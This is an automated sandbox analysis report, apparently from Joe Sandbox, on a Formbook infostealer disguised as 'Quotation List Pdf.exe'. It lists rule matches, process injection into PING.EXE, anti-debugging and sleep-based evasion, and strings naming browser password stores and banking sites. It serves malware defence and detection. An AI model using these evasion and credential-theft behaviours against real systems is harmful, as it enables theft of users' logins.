Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Quotation List Pdf.exe Static PE information: Section: .rsrc ZLIB complexity 0.9967180198598131
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/1@12/10
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768442F60 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 0_2_00007FF768442F60
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\SysWOW64\PING.EXE File created: C:\Users\user\AppData\Local\Temp\y870G2JOQ Jump to behavior
Source: Quotation List Pdf.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PING.EXE, 00000007.00000002.3297913979.0000000003184000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1738191649.0000000003136000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1738319140.0000000003156000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3297913979.0000000003156000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1740582907.0000000003160000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Quotation List Pdf.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\Quotation List Pdf.exe File read: C:\Users\user\Desktop\Quotation List Pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Quotation List Pdf.exe "C:\Users\user\Desktop\Quotation List Pdf.exe"
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
Source: C:\Windows\SysWOW64\PING.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe" Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE" Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Quotation List Pdf.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Quotation List Pdf.exe Static file information: File size 2404352 > 1048576
Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Quotation List Pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tiwTBKVufjvhPL.exe, 00000006.00000002.3297786595.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624296324.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vbc.pdb source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: ping.pdb source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
PE file contains sections with non-standard names
Source: Quotation List Pdf.exe Static PE information: section name: .managed
Source: Quotation List Pdf.exe Static PE information: section name: hydrated
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00418865 push 9C409E68h; retf 5_2_004188A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00411812 push ecx; iretd 5_2_00411815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_004141BD push edx; retn A625h 5_2_004141E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00406A65 push cs; ret 5_2_00406A66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00403320 push eax; ret 5_2_00403322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00408320 pushfd ; ret 5_2_0040832B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_004083A0 pushfd ; iretd 5_2_004083CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0041EDE3 push esp; retf 5_2_0041EE5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00401609 push ss; ret 5_2_0040160A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0041875E pushad ; ret 5_2_0041877A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00418703 pushad ; ret 5_2_0041877A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058109AD push ecx; mov dword ptr [esp], ecx 5_2_058109B6
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043C7C75 push cs; ret 6_2_043C7C76
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043C9530 pushfd ; ret 6_2_043C953B
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043C95B0 pushfd ; iretd 6_2_043C95DC
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043DF789 push es; retf 6_2_043DF7A2
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043DFFF3 push esp; retf 6_2_043E006D
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043E0038 push esp; retf 6_2_043E006D
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043E00E3 push edi; ret 6_2_043E00EB
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D9913 pushad ; ret 6_2_043D998A
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D996E pushad ; ret 6_2_043D998A
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D2A22 push ecx; iretd 6_2_043D2A25
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D9A75 push 9C409E68h; retf 6_2_043D9AB3
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03811200 push eax; iretd 7_2_03811369
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0381225F pushad ; ret 7_2_038127F9
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0381B008 push es; iretd 7_2_0381B009
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038127FA pushad ; ret 7_2_038127F9
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038409AD push ecx; mov dword ptr [esp], ecx 7_2_038409B6
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03819939 push es; iretd 7_2_03819940
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0381283D push eax; iretd 7_2_03812858
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_030A0FB4 push edi; iretd 7_2_030A0F8F
Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFBCB7ADA44
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory allocated: 16FC7390000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583BD30 rdtscp 5_2_0583BD30
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 3883 Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 6090 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\PING.EXE API coverage: 2.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\PING.EXE TID: 4132 Thread sleep count: 3883 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 4132 Thread sleep time: -7766000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 4132 Thread sleep count: 6090 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 4132 Thread sleep time: -12180000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452 Thread sleep time: -65000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452 Thread sleep time: -48000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0309BE10 FindFirstFileW,FindNextFileW,FindClose, 7_2_0309BE10
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768442B90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask, 0_2_00007FF768442B90
Source: y870G2JOQ.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: discord.comVMware20,11696494690f
Source: y870G2JOQ.7.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: y870G2JOQ.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: y870G2JOQ.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: y870G2JOQ.7.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Quotation List Pdf.exe Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: y870G2JOQ.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: y870G2JOQ.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: firefox.exe, 0000000B.00000002.1847485362.0000016FA2CBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW)
Source: y870G2JOQ.7.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3299312256.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: y870G2JOQ.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: PING.EXE, 00000007.00000002.3297913979.00000000030DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: y870G2JOQ.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: y870G2JOQ.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: y870G2JOQ.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: y870G2JOQ.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: y870G2JOQ.7.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: y870G2JOQ.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: y870G2JOQ.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: y870G2JOQ.7.dr Binary or memory string: global block list test formVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: y870G2JOQ.7.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: y870G2JOQ.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: y870G2JOQ.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: y870G2JOQ.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: y870G2JOQ.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: y870G2JOQ.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583BD30 rdtscp 5_2_0583BD30
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00417703 LdrLoadDll, 5_2_00417703
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05812582 mov eax, dword ptr fs:[00000030h] 5_2_05812582
